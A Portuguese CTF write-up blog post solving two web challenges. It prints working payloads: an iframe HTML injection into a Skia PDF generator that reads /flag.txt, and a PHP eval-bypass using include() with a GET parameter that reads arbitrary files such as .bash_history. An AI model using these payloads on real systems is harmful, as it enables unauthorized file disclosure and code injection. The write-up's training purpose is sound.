<h2 id="Receipt-Manager"><a href="#Receipt-Manager" class="headerlink" title="Receipt Manager"></a>Receipt Manager</h2><p>Descrição: “A group of strange developers have developed tools for generating fake business invoices. Your accountants did not like this very much and they assigned YOU to compromise their site. They also told you their flag is located on &#x2F;flag.txt”<br>Target: <a target="_blank" rel="noopener" href="https://receipt-manager-1.boita.tech/">https://receipt-manager-1.boita.tech/</a></p>
<p>Ao acessar a target url você encontra uma tela com um input de texto onde você pode gerar recibos (Esqueci de printar :&#x2F;), ao clicar no botão a aplicação gerava um pdf no servidor refletindo o valor que foi enviado no input.</p>
<p>Ao analisar os metadados do pdf podemos descobrir como ele é gerado com o Skia, pesquisando por “Skia exploit” no google você descobre que ele é vulnerável a html injection e é possível fazer ataques de SSRF.<br><img src="/img/aratuctf/Pasted image 20220911220203.png" srcset="/img/loading.gif" lazyload /></p>
<p>Na descrição da chall é dito que a flag está em &#x2F;flag.txt, então é só usarmos o iframe pra ler a flag: <code>&lt;iframe src=file:///flag.txt&gt;</code><br><img src="/img/aratuctf/Pasted image 20220911220711.png" srcset="/img/loading.gif" lazyload /></p>
<h2 id="Sandbox"><a href="#Sandbox" class="headerlink" title="Sandbox"></a>Sandbox</h2><p>Descrição: “Sandbox, criamos uma sandbox 100% segura, agora sim, será impossivel você conseguir acesso!”<br>Target: <a target="_blank" rel="noopener" href="https://sandbox.boita.tech/">https://sandbox.boita.tech/</a><br>Source code: <a target="_blank" rel="noopener" href="https://aratu-public-downloads.s3.amazonaws.com/sandbox.zip">https://aratu-public-downloads.s3.amazonaws.com/sandbox.zip</a></p>
<p>A sandbox é basicamente uma versão mais difícil da baby sandbox:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;username&#x27;</span>]))&#123;<br>	<span class="hljs-variable">$param</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;username&#x27;</span>];<br>	<span class="hljs-variable">$username</span> = <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&quot;/[^a-zA-Z0-9_\$\&#123;\&#125;_()\-\&gt;\,]+/mi&quot;</span>, <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-variable">$param</span>);<br>	<span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">str_contains</span>(<span class="hljs-variable">$username</span>, <span class="hljs-string">&#x27;eval&#x27;</span>))&#123;<br>		<span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;No eval() for you!&#x27;</span>);<br>	&#125;<br>	<span class="hljs-keyword">unset</span>(<span class="hljs-variable">$param</span>);<br>	<span class="hljs-keyword">echo</span> <span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;echo \&quot;$&#123;username&#125;\&quot;;&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>Meu payload da baby sandbox funcionou sem proplemas na sandbox haha, free flag xD.<br>Eu só precisei mudar pra função include para ler arquivos pq as funções system(), shell_exec() e exec() não funcionaram :(</p>
<p>Lendo .bash_history:<br><img src="/img/aratuctf/Pasted image 20220911215301.png" srcset="/img/loading.gif" lazyload /><br>Lendo a flag leakada do .bash_history:<br><img src="/img/aratuctf/Pasted image 20220911215611.png" srcset="/img/loading.gif" lazyload /></p>
<p>Payload final: <code>https://sandbox.boita.tech/?username=blaidd$&#123;include(array_pop(array_values($_GET)))&#125;&amp;file=/root/this_is_the_flag-from-leaked-from-history.txt</code></p>
<h2 id="End"><a href="#End" class="headerlink" title="End"></a>End</h2><p>Parabéns pro pessoal da Boitatech pelo CTF e pelo evento da Semana Aratu, foi muito divertido resolver essas challs e aprendi bastante coisa com as palestras :D</p>
<p>Esse foi o ranking final:<br><img src="/img/aratuctf/Pasted image 20220912002652.png" srcset="/img/loading.gif" lazyload /></p>
<p class="note note-info">Author: <a href="https://twitter.com/blaiddx64" target="_blank">Blaidd</a></p>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Write-up/">#Write-up</a>
      
        <a href="/tags/CTF/">#CTF</a>
      
        <a href="/tags/PT-BR/">#PT-BR</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/22/cowboyhacker/" title="THM Bounty Hacker Write-up">
                        <span class="hidden-mobile">THM Bounty Hacker Write-up</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    
      <script type="text/javascript">
        var disqus_config = function() {
          this.page.url = 'https://blaidd.xyz/2022/09/12/aratu_web_write_up/';
          this.page.identifier = '/2022/09/12/aratu_web_write_up/';
        };
        Fluid.utils.loadComments('#disqus_thread', function() {
          var d = document, s = d.createElement('script');
          s.src = '//' + 'fluid' + '.disqus.com/embed.js';
          s.setAttribute('data-timestamp', new Date());
          (d.head || d.body).appendChild(s);
        });
      </script>
    
    <noscript>Please enable JavaScript to view the comments</noscript>
  </div>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;Table of Contents</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
